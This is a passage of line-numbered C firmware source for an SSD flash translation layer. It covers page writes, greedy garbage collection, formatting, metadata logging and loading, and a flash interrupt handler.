443 g_ftl_statistics[bank].page_wcount++;

445 // if old data already exist,

446 if (old_vpn != NULL)

447 {

448 vblock = old_vpn / PAGES_PER_BLK;

449 page_num = old_vpn % PAGES_PER_BLK;

451 // ------

452 // `Partial programming'

453 // we cannot determine whether the new data has been loaded into the SATA write buffer.

454 // Thus, read the left/right hole sectors of the valid page and copy them into the write buffer.

455 // Then program the whole page of valid data.

456 // ------

457 if (num_sectors != SECTORS_PER_PAGE)

458 {

459 // Performance optimization (not yet proven)

460 // To reduce flash memory accesses, copy the valid hole sectors into the SATA write buffer after reading the whole page.

461 // In this case we need just one full page read plus one or two mem_copy calls.

462 if ((num_sectors <= 8) && (page_offset != 0))

463 {

464 // one page async read

465 nand_page_read(bank,

466 vblock,

467 page_num,

468 FTL_BUF(bank));

469 // copy `left hole sectors' into SATA write buffer

470 if (page_offset != 0)

471 {

472 mem_copy(WR_BUF_PTR(g_ftl_write_buf_id),

473 FTL_BUF(bank),

474 page_offset * BYTES_PER_SECTOR);

475 }

476 // copy `right hole sectors' into SATA write buffer

477 if ((page_offset + column_cnt) < SECTORS_PER_PAGE)

478 {

479 UINT32 const rhole_base = (page_offset + column_cnt) * BYTES_PER_SECTOR;

481 mem_copy(WR_BUF_PTR(g_ftl_write_buf_id) + rhole_base,

482 FTL_BUF(bank) + rhole_base,

483 BYTES_PER_PAGE - rhole_base);

484 }

485 }

486 // left/right hole async read operation (two partial page read)

487 else

488 {

489 // read `left hole sectors'

490 if (page_offset != 0)

491 {

492 nand_page_ptread(bank,

493 vblock,

494 page_num,

495 0,

496 page_offset,

497 WR_BUF_PTR(g_ftl_write_buf_id),

498 RETURN_ON_ISSUE);

499 }

500 // read `right hole sectors'

501 if ((page_offset + column_cnt) < SECTORS_PER_PAGE)

502 {

503 nand_page_ptread(bank,

504 vblock,

505 page_num,

506 page_offset + column_cnt,

507 SECTORS_PER_PAGE - (page_offset + column_cnt),

508 WR_BUF_PTR(g_ftl_write_buf_id),

509 RETURN_ON_ISSUE);

510 }

511 }

512 }

513 // full page write

514 page_offset = 0;

515 column_cnt = SECTORS_PER_PAGE;

516 // invalid old page (decrease vcount)

517 set_vcount(bank, vblock, get_vcount(bank, vblock) - 1);

518 }

519 vblock = new_vpn / PAGES_PER_BLK;

520 page_num = new_vpn % PAGES_PER_BLK;

521 ASSERT(get_vcount(bank,vblock) < (PAGES_PER_BLK - 1));

523 // write new data (make sure that the new data is ready in the write buffer frame)

524 // (c.f FO_B_SATA_W flag in flash.h)

525 nand_page_ptprogram_from_host(bank,

526 vblock,

527 page_num,

528 page_offset,

529 column_cnt);

530 // update metadata

531 set_lpn(bank, page_num, lpn);

532 set_vpn(lpn, new_vpn);

533 set_vcount(bank, vblock, get_vcount(bank, vblock) + 1);

534 }

535 // get vpn from PAGE_MAP

536 static UINT32 get_vpn(UINT32 const lpn)

537 {

538 CHECK_LPAGE(lpn);

539 return read_dram_32(PAGE_MAP_ADDR + lpn * sizeof(UINT32));

540 }

541 // set vpn to PAGE_MAP

542 static void set_vpn(UINT32 const lpn, UINT32 const vpn)

543 {

544 CHECK_LPAGE(lpn);

545 ASSERT(vpn >= (META_BLKS_PER_BANK * PAGES_PER_BLK) && vpn < (VBLKS_PER_BANK * PAGES_PER_BLK));

547 write_dram_32(PAGE_MAP_ADDR + lpn * sizeof(UINT32), vpn);

548 }

549 // get valid page count of vblock

550 static UINT32 get_vcount(UINT32 const bank, UINT32 const vblock)

551 {

552 UINT32 vcount;

554 ASSERT(bank < NUM_BANKS);

555 ASSERT((vblock >= META_BLKS_PER_BANK) && (vblock < VBLKS_PER_BANK));

557 vcount = read_dram_16(VCOUNT_ADDR + (((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16)));

558 ASSERT((vcount < PAGES_PER_BLK) || (vcount == VC_MAX));

560 return vcount;

561 }

562 // set valid page count of vblock

563 static void set_vcount(UINT32 const bank, UINT32 const vblock, UINT32 const vcount)

564 {

565 ASSERT(bank < NUM_BANKS);

566 ASSERT((vblock >= META_BLKS_PER_BANK) && (vblock < VBLKS_PER_BANK));

567 ASSERT((vcount < PAGES_PER_BLK) || (vcount == VC_MAX));

569 write_dram_16(VCOUNT_ADDR + (((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16)), vcount);

570 }

571 static UINT32 assign_new_write_vpn(UINT32 const bank)

572 {

573 ASSERT(bank < NUM_BANKS);

575 UINT32 write_vpn;

576 UINT32 vblock;

578 write_vpn = get_cur_write_vpn(bank);

579 vblock = write_vpn / PAGES_PER_BLK;

581 // NOTE: if the next new write page's offset is

582 // the last page offset of the vblock (i.e. PAGES_PER_BLK - 1),

583 if ((write_vpn % PAGES_PER_BLK) == (PAGES_PER_BLK - 2))

584 {

585 // then, because of a flash controller limitation

586 // (access to the spare area, i.e. OOB, is prohibited),

587 // we persistently write the lpn list into the last page of the vblock.

588 mem_copy(FTL_BUF(bank), g_misc_meta[bank].lpn_list_of_cur_vblock, sizeof(UINT32) * PAGES_PER_BLK);

589 // fix minor bug

590 nand_page_ptprogram(bank, vblock, PAGES_PER_BLK - 1, 0,

591 ((sizeof(UINT32) * PAGES_PER_BLK + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR), FTL_BUF(bank));

593 mem_set_sram(g_misc_meta[bank].lpn_list_of_cur_vblock, 0x00000000, sizeof(UINT32) * PAGES_PER_BLK);

595 inc_full_blk_cnt(bank);

597 // do garbage collection if necessary

598 if (is_full_all_blks(bank))

599 {

600 garbage_collection(bank);

601 return get_cur_write_vpn(bank);

602 }

603 do

604 {

605 vblock++;

607 ASSERT(vblock != VBLKS_PER_BANK);

608 }while (get_vcount(bank, vblock) == VC_MAX);

609 }

610 // write page -> next block

611 if (vblock != (write_vpn / PAGES_PER_BLK))

612 {

613 write_vpn = vblock * PAGES_PER_BLK;

614 }

615 else

616 {

617 write_vpn++;

618 }

619 set_new_write_vpn(bank, write_vpn);

621 return write_vpn;

622 }

623 static BOOL32 is_bad_block(UINT32 const bank, UINT32 const vblk_offset)

624 {

625 if (tst_bit_dram(BAD_BLK_BMP_ADDR + bank*(VBLKS_PER_BANK/8 + 1), vblk_offset) == FALSE)

626 {

627 return FALSE;

628 }

629 return TRUE;

630 }

631 //------

632 // if all blocks except one free block are full,

633 // do garbage collection for making at least one free page

634 //------

635 static void garbage_collection(UINT32 const bank)

636 {

637 ASSERT(bank < NUM_BANKS);

638 g_ftl_statistics[bank].gc_cnt++;

640 UINT32 src_lpn;

641 UINT32 vt_vblock;

642 UINT32 free_vpn;

643 UINT32 vcount; // valid page count in victim block

644 UINT32 src_page;

645 UINT32 gc_vblock;

647 g_ftl_statistics[bank].gc_cnt++;

649 vt_vblock = get_vt_vblock(bank); // get victim block

650 vcount = get_vcount(bank, vt_vblock);

651 gc_vblock = get_gc_vblock(bank);

652 free_vpn = gc_vblock * PAGES_PER_BLK;

654 /* uart_printf("garbage_collection bank %d, vblock %d",bank, vt_vblock); */

656 ASSERT(vt_vblock != gc_vblock);

657 ASSERT(vt_vblock >= META_BLKS_PER_BANK && vt_vblock < VBLKS_PER_BANK);

658 ASSERT(vcount < (PAGES_PER_BLK - 1));

659 ASSERT(get_vcount(bank, gc_vblock) == VC_MAX);

660 ASSERT(!is_bad_block(bank, gc_vblock));

662 // 1. load p2l list from last page offset of victim block (4B x PAGES_PER_BLK)

663 // fix minor bug

664 nand_page_ptread(bank, vt_vblock, PAGES_PER_BLK - 1, 0,

665 ((sizeof(UINT32) * PAGES_PER_BLK + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR), FTL_BUF(bank), RETURN_WHEN_DONE);

666 mem_copy(g_misc_meta[bank].lpn_list_of_cur_vblock, FTL_BUF(bank), sizeof(UINT32) * PAGES_PER_BLK);

667 // 2. copy-back all valid pages to free space

668 for (src_page = 0; src_page < (PAGES_PER_BLK - 1); src_page++)

669 {

670 // get lpn of victim block from a read lpn list

671 src_lpn = get_lpn(bank, src_page);

672 CHECK_VPAGE(get_vpn(src_lpn));

674 // determine whether the page is valid or not

675 if (get_vpn(src_lpn) !=

676 ((vt_vblock * PAGES_PER_BLK) + src_page))

677 {

678 // invalid page

679 continue;

680 }

681 ASSERT(get_lpn(bank, src_page) != INVALID);

682 CHECK_LPAGE(src_lpn);

683 // if the page is valid,

684 // then do copy-back op. to free space

685 nand_page_copyback(bank,

686 vt_vblock,

687 src_page,

688 free_vpn / PAGES_PER_BLK,

689 free_vpn % PAGES_PER_BLK);

690 ASSERT((free_vpn / PAGES_PER_BLK) == gc_vblock);

691 // update metadata

692 set_vpn(src_lpn, free_vpn);

693 set_lpn(bank, (free_vpn % PAGES_PER_BLK), src_lpn);

695 free_vpn++;

696 }

697 #if OPTION_ENABLE_ASSERT

698 if (vcount == 0)

699 {

700 ASSERT(free_vpn == (gc_vblock * PAGES_PER_BLK));

701 }

702 #endif

703 // 3. erase victim block

704 nand_block_erase(bank, vt_vblock);

705 ASSERT((free_vpn % PAGES_PER_BLK) < (PAGES_PER_BLK - 2));

706 ASSERT((free_vpn % PAGES_PER_BLK == vcount));

708 /* uart_printf("gc page count : %d", vcount); */

710 // 4. update metadata

711 set_vcount(bank, vt_vblock, VC_MAX);

712 set_vcount(bank, gc_vblock, vcount);

713 set_new_write_vpn(bank, free_vpn); // set a free page for new write

714 set_gc_vblock(bank, vt_vblock); // next free block (reserve for GC)

715 dec_full_blk_cnt(bank); // decrease full block count

716 /* uart_print("garbage_collection end"); */

717 }

718 //------

719 // Victim selection policy: Greedy

720 //

721 // Select the block which contains the minimum number of valid pages

722 //------

723 static UINT32 get_vt_vblock(UINT32 const bank)

724 {

725 ASSERT(bank < NUM_BANKS);

727 UINT32 vblock;

729 // search for the block with the minimum number of valid pages

730 vblock = mem_search_min_max(VCOUNT_ADDR + (bank * VBLKS_PER_BANK * sizeof(UINT16)),

731 sizeof(UINT16),

732 VBLKS_PER_BANK,

733 MU_CMD_SEARCH_MIN_DRAM);

735 ASSERT(is_bad_block(bank, vblock) == FALSE);

736 ASSERT(vblock >= META_BLKS_PER_BANK && vblock < VBLKS_PER_BANK);

737 ASSERT(get_vcount(bank, vblock) < (PAGES_PER_BLK - 1));

739 return vblock;

740 }

741 static void format(void)

742 {

743 UINT32 bank, vblock, vcount_val;

745 ASSERT(NUM_MISC_META_SECT > 0);

746 ASSERT(NUM_VCOUNT_SECT > 0);

748 uart_printf("Total FTL DRAM metadata size: %d KB", DRAM_BYTES_OTHER / 1024);

750 uart_printf("VBLKS_PER_BANK: %d", VBLKS_PER_BANK);

751 uart_printf("LBLKS_PER_BANK: %d", NUM_LPAGES / PAGES_PER_BLK / NUM_BANKS);

752 uart_printf("META_BLKS_PER_BANK: %d", META_BLKS_PER_BANK);

754 //------

755 // initialize DRAM metadata

756 //------

757 mem_set_dram(PAGE_MAP_ADDR, NULL, PAGE_MAP_BYTES);

758 mem_set_dram(VCOUNT_ADDR, NULL, VCOUNT_BYTES);

760 //------

761 // erase all blocks except vblock #0

762 //------

763 for (vblock = MISCBLK_VBN; vblock < VBLKS_PER_BANK; vblock++)

764 {

765 for (bank = 0; bank < NUM_BANKS; bank++)

766 {

767 vcount_val = VC_MAX;

768 if (is_bad_block(bank, vblock) == FALSE)

769 {

770 nand_block_erase(bank, vblock);

771 vcount_val = 0;

772 }

773 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16),

774 vcount_val);

775 }

776 }

777 //------

778 // initialize SRAM metadata

779 //------

780 init_metadata_sram();

782 // flush metadata to NAND

783 logging_pmap_table();

784 logging_misc_metadata();

786 write_format_mark();

787 led(1);

788 uart_print("format complete");

789 }

790 static void init_metadata_sram(void)

791 {

792 UINT32 bank;

793 UINT32 vblock;

794 UINT32 mapblk_lbn;

796 //------

797 // initialize misc. metadata

798 //------

799 for (bank = 0; bank < NUM_BANKS; bank++)

800 {

801 g_misc_meta[bank].free_blk_cnt = VBLKS_PER_BANK - META_BLKS_PER_BANK;

802 g_misc_meta[bank].free_blk_cnt -= get_bad_blk_cnt(bank);

803 // NOTE: vblocks #0 and #1 are not used for user space

804 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + 0) * sizeof(UINT16), VC_MAX);

805 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + 1) * sizeof(UINT16), VC_MAX);

807 //------

808 // assign misc. block

809 //------

810 // assumption: vblock #1 is at a fixed location.

811 // Thus if vblock #1 is a bad block, another block should be allocated.

812 set_miscblk_vpn(bank, MISCBLK_VBN * PAGES_PER_BLK - 1);

813 ASSERT(is_bad_block(bank, MISCBLK_VBN) == FALSE);

815 vblock = MISCBLK_VBN;

817 //------

818 // assign map block

819 //------

820 mapblk_lbn = 0;

821 while (mapblk_lbn < MAPBLKS_PER_BANK)

822 {

823 vblock++;

824 ASSERT(vblock < VBLKS_PER_BANK);

825 if (is_bad_block(bank, vblock) == FALSE)

826 {

827 set_mapblk_vpn(bank, mapblk_lbn, vblock * PAGES_PER_BLK);

828 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16), VC_MAX);

829 mapblk_lbn++;

830 }

831 }

832 //------

833 // assign free block for gc

834 //------

835 do

836 {

837 vblock++;

838 // NOTE: the free block should not be selected as a victim at the first GC

839 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16), VC_MAX);

840 // set free block

841 set_gc_vblock(bank, vblock);

843 ASSERT(vblock < VBLKS_PER_BANK);

844 }while(is_bad_block(bank, vblock) == TRUE);

845 //------

846 // assign free vpn for first new write

847 //------

848 do

849 {

850 vblock++;

851 // use the next non-bad vblock as the first write location

852 set_new_write_vpn(bank, vblock * PAGES_PER_BLK);

853 ASSERT(vblock < VBLKS_PER_BANK);

854 }while(is_bad_block(bank, vblock) == TRUE);

855 }

856 }

857 // logging misc + vcount metadata

858 static void logging_misc_metadata(void)

859 {

860 UINT32 misc_meta_bytes = NUM_MISC_META_SECT * BYTES_PER_SECTOR; // per bank

861 UINT32 vcount_addr = VCOUNT_ADDR;

862 UINT32 vcount_bytes = NUM_VCOUNT_SECT * BYTES_PER_SECTOR; // per bank

863 UINT32 vcount_boundary = VCOUNT_ADDR + VCOUNT_BYTES; // entire vcount data

864 UINT32 bank;

866 flash_finish();

868 for (bank = 0; bank < NUM_BANKS; bank++)

869 {

870 inc_miscblk_vpn(bank);

872 // note: if misc. meta block is full, just erase old block & write offset #0

873 if ((get_miscblk_vpn(bank) / PAGES_PER_BLK) != MISCBLK_VBN)

874 {

875 nand_block_erase(bank, MISCBLK_VBN);

876 set_miscblk_vpn(bank, MISCBLK_VBN * PAGES_PER_BLK); // vpn = 128

877 }

878 // copy misc. metadata to FTL buffer

879 mem_copy(FTL_BUF(bank), &g_misc_meta[bank], misc_meta_bytes);

881 // copy vcount metadata to FTL buffer

882 if (vcount_addr <= vcount_boundary)

883 {

884 mem_copy(FTL_BUF(bank) + misc_meta_bytes, vcount_addr, vcount_bytes);

885 vcount_addr += vcount_bytes;

886 }

887 }

888 // logging the misc. metadata to nand flash

889 for (bank = 0; bank < NUM_BANKS; bank++)

890 {

891 nand_page_ptprogram(bank,

892 get_miscblk_vpn(bank) / PAGES_PER_BLK,

893 get_miscblk_vpn(bank) % PAGES_PER_BLK,

894 0,

895 NUM_MISC_META_SECT + NUM_VCOUNT_SECT,

896 FTL_BUF(bank));

897 }

898 flash_finish();

899 }

900 static void logging_pmap_table(void)

901 {

902 UINT32 pmap_addr = PAGE_MAP_ADDR;

903 UINT32 pmap_bytes = BYTES_PER_PAGE; // per bank

904 UINT32 mapblk_vpn;

905 UINT32 bank;

906 UINT32 pmap_boundary = PAGE_MAP_ADDR + PAGE_MAP_BYTES;

907 BOOL32 finished = FALSE;

909 for (UINT32 mapblk_lbn = 0; mapblk_lbn < MAPBLKS_PER_BANK; mapblk_lbn++)

910 {

911 flash_finish();

913 for (bank = 0; bank < NUM_BANKS; bank++)

914 {

915 if (finished)

916 {

917 break;

918 }

919 else if (pmap_addr >= pmap_boundary)

920 {

921 finished = TRUE;

922 break;

923 }

924 else if (pmap_addr + BYTES_PER_PAGE >= pmap_boundary)

925 {

926 finished = TRUE;

927 pmap_bytes = (pmap_boundary - pmap_addr + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR * BYTES_PER_SECTOR;

928 }

929 inc_mapblk_vpn(bank, mapblk_lbn);

931 mapblk_vpn = get_mapblk_vpn(bank, mapblk_lbn);

933 // note: if there is no free page, then erase old map block first.

934 if ((mapblk_vpn % PAGES_PER_BLK) == 0)

935 {

936 // erase full map block

937 nand_block_erase(bank, (mapblk_vpn - 1) / PAGES_PER_BLK);

939 // next vpn of mapblk is offset #0

940 set_mapblk_vpn(bank, mapblk_lbn, ((mapblk_vpn - 1) / PAGES_PER_BLK)*PAGES_PER_BLK);

941 mapblk_vpn = get_mapblk_vpn(bank, mapblk_lbn);

942 }

943 // copy the page mapping table to FTL buffer

944 mem_copy(FTL_BUF(bank), pmap_addr, pmap_bytes);

946 // log the updated page mapping table into the map block

947 nand_page_ptprogram(bank,

948 mapblk_vpn / PAGES_PER_BLK,

949 mapblk_vpn % PAGES_PER_BLK,

950 0,

951 pmap_bytes / BYTES_PER_SECTOR,

952 FTL_BUF(bank));

953 pmap_addr += pmap_bytes;

954 }

955 if (finished)

956 {

957 break;

958 }

959 }

960 flash_finish();

961 }

962 // load flushed FTL metadata

963 static void load_metadata(void)

964 {

965 load_misc_metadata();

966 load_pmap_table();

967 }

968 // misc + VCOUNT

969 static void load_misc_metadata(void)

970 {

971 UINT32 misc_meta_bytes = NUM_MISC_META_SECT * BYTES_PER_SECTOR;

972 UINT32 vcount_bytes = NUM_VCOUNT_SECT * BYTES_PER_SECTOR;

973 UINT32 vcount_addr = VCOUNT_ADDR;

974 UINT32 vcount_boundary = VCOUNT_ADDR + VCOUNT_BYTES;

976 UINT32 load_flag = 0;

977 UINT32 bank, page_num;

978 UINT32 load_cnt = 0;

980 flash_finish();

982 disable_irq();

983 flash_clear_irq(); // clear any flash interrupt flags that might have been set

985 // scan valid metadata in descending order from last page offset

986 for (page_num = PAGES_PER_BLK - 1; page_num != ((UINT32) -1); page_num--)

987 {

988 for (bank = 0; bank < NUM_BANKS; bank++)

989 {

990 if (load_flag & (0x1 << bank))

991 {

992 continue;

993 }

994 // read valid metadata from misc. metadata area

995 nand_page_ptread(bank,

996 MISCBLK_VBN,

997 page_num,

998 0,

999 NUM_MISC_META_SECT + NUM_VCOUNT_SECT,

1000 FTL_BUF(bank),

1001 RETURN_ON_ISSUE);

1002 }

1003 flash_finish();

1005 for (bank = 0; bank < NUM_BANKS; bank++)

1006 {

1007 if (!(load_flag & (0x1 << bank)) && !(BSP_INTR(bank) & FIRQ_ALL_FF ))

1008 {

1009 load_flag = load_flag | (0x1 << bank);

1010 load_cnt++;

1011 }

1012 CLR_BSP_INTR(bank, 0xFF);

1013 }

1014 }

1015 ASSERT(load_cnt == NUM_BANKS);

1017 for (bank = 0; bank < NUM_BANKS; bank++)

1018 {

1019 // misc. metadata

1020 mem_copy(&g_misc_meta[bank], FTL_BUF(bank), sizeof(misc_metadata));

1022 // vcount metadata

1023 if (vcount_addr <= vcount_boundary)

1024 {

1025 mem_copy(vcount_addr, FTL_BUF(bank) + misc_meta_bytes, vcount_bytes);

1026 vcount_addr += vcount_bytes;

1028 }

1029 }

1030 enable_irq();

1031 }

1032 static void load_pmap_table(void)

1033 {

1034 UINT32 pmap_addr = PAGE_MAP_ADDR;

1035 UINT32 temp_page_addr;

1036 UINT32 pmap_bytes = BYTES_PER_PAGE; // per bank

1037 UINT32 pmap_boundary = PAGE_MAP_ADDR + (NUM_LPAGES * sizeof(UINT32));

1038 UINT32 mapblk_lbn, bank;

1039 BOOL32 finished = FALSE;

1041 flash_finish();

1043 for (mapblk_lbn = 0; mapblk_lbn < MAPBLKS_PER_BANK; mapblk_lbn++)

1044 {

1045 temp_page_addr = pmap_addr; // backup page mapping addr

1047 for (bank = 0; bank < NUM_BANKS; bank++)

1048 {

1049 if (finished)

1050 {

1051 break;

1052 }

1053 else if (pmap_addr >= pmap_boundary)

1054 {

1055 finished = TRUE;

1056 break;

1057 }

1058 else if (pmap_addr + BYTES_PER_PAGE >= pmap_boundary)

1059 {

1060 finished = TRUE;

1061 pmap_bytes = (pmap_boundary - pmap_addr + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR * BYTES_PER_SECTOR;

1062 }

1063 // read page mapping table from map_block

1064 nand_page_ptread(bank,

1065 get_mapblk_vpn(bank, mapblk_lbn) / PAGES_PER_BLK,

1066 get_mapblk_vpn(bank, mapblk_lbn) % PAGES_PER_BLK,

1067 0,

1068 pmap_bytes / BYTES_PER_SECTOR,

1069 FTL_BUF(bank),

1070 RETURN_ON_ISSUE);

1071 pmap_addr += pmap_bytes;

1072 }

1073 flash_finish();

1075 pmap_bytes = BYTES_PER_PAGE;

1076 for (bank = 0; bank < NUM_BANKS; bank++)

1077 {

1078 if (temp_page_addr >= pmap_boundary)

1079 {

1080 break;

1081 }

1082 else if (temp_page_addr + BYTES_PER_PAGE >= pmap_boundary)

1083 {

1084 pmap_bytes = (pmap_boundary - temp_page_addr + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR * BYTES_PER_SECTOR;

1085 }

1086 // copy page mapping table to PMAP_ADDR from FTL buffer

1087 mem_copy(temp_page_addr, FTL_BUF(bank), pmap_bytes);

1089 temp_page_addr += pmap_bytes;

1090 }

1091 if (finished)

1092 {

1093 break;

1094 }

1095 }

1096 }

1097 static void write_format_mark(void)

1098 {

1099 // This function writes a format mark to a page at (bank #0, block #0).

1101 #ifdef __GNUC__

1102 extern UINT32 size_of_firmware_image;

1103 UINT32 firmware_image_pages = (((UINT32) (&size_of_firmware_image)) + BYTES_PER_FW_PAGE - 1) / BYTES_PER_FW_PAGE;

1104 #else

1105 extern UINT32 Image$$ER_CODE$$RO$$Length;

1106 extern UINT32 Image$$ER_RW$$RW$$Length;

1107 UINT32 firmware_image_bytes = ((UINT32) &Image$$ER_CODE$$RO$$Length) + ((UINT32) &Image$$ER_RW$$RW$$Length);

1108 UINT32 firmware_image_pages = (firmware_image_bytes + BYTES_PER_FW_PAGE - 1) / BYTES_PER_FW_PAGE;

1109 #endif

1111 UINT32 format_mark_page_offset = FW_PAGE_OFFSET + firmware_image_pages;

1113 mem_set_dram(FTL_BUF_ADDR, 0, BYTES_PER_SECTOR);

1115 SETREG(FCP_CMD,FC_COL_ROW_IN_PROG);

1116 SETREG(FCP_BANK, REAL_BANK(0));

1117 SETREG(FCP_OPTION, FO_E | FO_B_W_DRDY);

1118 SETREG(FCP_DMA_ADDR,FTL_BUF_ADDR); // DRAM -> flash

1119 SETREG(FCP_DMA_CNT,BYTES_PER_SECTOR);

1120 SETREG(FCP_COL, 0);

1121 SETREG(FCP_ROW_L(0), format_mark_page_offset);

1122 SETREG(FCP_ROW_H(0), format_mark_page_offset);

1124 // At this point, we do not have to check Waiting Room status before issuing a command,

1125 // because we have waited for all the banks to become idle before returning from format().

1126 SETREG(FCP_ISSUE,NULL);

1128 // wait for the FC_COL_ROW_IN_PROG command to be accepted by bank #0

1129 while ((GETREG(WR_STAT) & 0x00000001) != 0);

1131 // wait until bank #0 finishes the write operation

1132 while (BSP_FSM(0) != BANK_IDLE);

1133 }

1134 static BOOL32 check_format_mark(void)

1135 {

1136 // This function reads a flash page from (bank #0, block #0) in order to check whether the SSD is formatted or not.

1138 #ifdef __GNUC__

1139 extern UINT32 size_of_firmware_image;

1140 UINT32 firmware_image_pages = (((UINT32) (&size_of_firmware_image)) + BYTES_PER_FW_PAGE - 1) / BYTES_PER_FW_PAGE;

1141 #else

1142 extern UINT32 Image$$ER_CODE$$RO$$Length;

1143 extern UINT32 Image$$ER_RW$$RW$$Length;

1144 UINT32 firmware_image_bytes = ((UINT32) &Image$$ER_CODE$$RO$$Length) + ((UINT32) &Image$$ER_RW$$RW$$Length);

1145 UINT32 firmware_image_pages = (firmware_image_bytes + BYTES_PER_FW_PAGE - 1) / BYTES_PER_FW_PAGE;

1146 #endif

1148 UINT32 format_mark_page_offset = FW_PAGE_OFFSET + firmware_image_pages;

1149 UINT32 temp;

1151 flash_clear_irq(); // clear any flash interrupt flags that might have been set

1153 SETREG(FCP_CMD,FC_COL_ROW_READ_OUT);

1154 SETREG(FCP_BANK, REAL_BANK(0));

1155 SETREG(FCP_OPTION,FO_E);

1156 SETREG(FCP_DMA_ADDR,FTL_BUF_ADDR); // flash -> DRAM

1157 SETREG(FCP_DMA_CNT,BYTES_PER_SECTOR);

1158 SETREG(FCP_COL, 0);

1159 SETREG(FCP_ROW_L(0), format_mark_page_offset);

1160 SETREG(FCP_ROW_H(0), format_mark_page_offset);

1162 // At this point, we do not have to check Waiting Room status before issuing a command,

1163 // because scan list loading has been completed just before this function is called.

1164 SETREG(FCP_ISSUE,NULL);

1166 // wait for the FC_COL_ROW_READ_OUT command to be accepted by bank #0

1167 while ((GETREG(WR_STAT) & 0x00000001) != 0);

1169 // wait until bank #0 finishes the read operation

1170 while (BSP_FSM(0) != BANK_IDLE);

1172 // Now that the read operation is complete, we can check interrupt flags.

1173 temp = BSP_INTR(0) & FIRQ_ALL_FF;

1175 // clear interrupt flags

1176 CLR_BSP_INTR(0, 0xFF);

1178 if (temp != 0)

1179 {

1180 return FALSE; // the page contains all-0xFF (the format mark does not exist.)

1181 }

1182 else

1183 {

1184 return TRUE; // the page contains something other than 0xFF (it must be the format mark)

1185 }

1186 }

1188 // BSP interrupt service routine

1189 void ftl_isr(void)

1190 {

1191 UINT32 bank;

1192 UINT32 bsp_intr_flag;

1194 uart_print("BSP interrupt occurred...");

1195 // interrupt pending clear (ICU)

1196 SETREG(APB_INT_STS,INTR_FLASH);

1198 for (bank = 0; bank < NUM_BANKS; bank++) {

1199 while (BSP_FSM(bank) != BANK_IDLE);

1200 // get interrupt flag from BSP

1201 bsp_intr_flag = BSP_INTR(bank);

1203 if (bsp_intr_flag == 0) {

1204 continue;

1205 }

1206 UINT32 fc = GETREG(BSP_CMD(bank));

1207 // BSP clear

1208 CLR_BSP_INTR(bank, bsp_intr_flag);

1210 // interrupt handling

1211 if (bsp_intr_flag & FIRQ_DATA_CORRUPT) {

1212 uart_printf("BSP interrupt at bank: 0x%x", bank);

1213 uart_print("FIRQ_DATA_CORRUPT occurred...");

1214 }

1215 if (bsp_intr_flag & (FIRQ_BADBLK_H | FIRQ_BADBLK_L)) {

1216 uart_printf("BSP interrupt at bank: 0x%x", bank);

1217 if (fc == FC_COL_ROW_IN_PROG || fc == FC_IN_PROG || fc == FC_PROG) {

1218 uart_print("runtime bad block found during block program...");

1219 }

1220 else {

1221 uart_printf("runtime bad block found during block erase...vblock #: %d", GETREG(BSP_ROW_H(bank)) / PAGES_PER_BLK);

1222 ASSERT(fc == FC_ERASE);

1223 }

1224 }

1225 }

1226 }